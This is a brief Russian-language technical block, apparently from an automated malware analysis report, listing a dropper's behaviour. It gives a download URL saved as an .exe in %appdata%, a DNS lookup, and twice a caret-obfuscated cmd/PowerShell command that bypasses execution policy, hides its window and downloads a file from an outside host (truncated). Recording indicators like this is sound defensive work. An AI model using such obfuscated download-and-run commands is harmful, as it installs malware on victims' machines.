Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^owE^RS^HELL.^e^X^E -ExEcU^tI^On^pO^lI^cY By^pA^s^S^ -NOPrOfi^Le -WI^nD^O^w^STyl^e^ HIdDeN (n^Ew-O^B^Je^ct syS^tE^M.^NEt.^we^bClIe^NT)^.DOwNLOaDF^i^LE(^'http://www.fopeioaa...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /C "p^owE^RS^HELL.^e^X^E -ExEcU^tI^On^pO^lI^cY By^pA^s^S^ -NOPrOfi^Le -WI^nD^O^w^STyl^e^ HIdDeN (n^Ew-O^B^Je^ct syS^tE^M.^NEt.^we^bClIe^NT)^.DOwNLOaDF^i^LE(^'http://www.fopeioaa...' (со скрытым окном)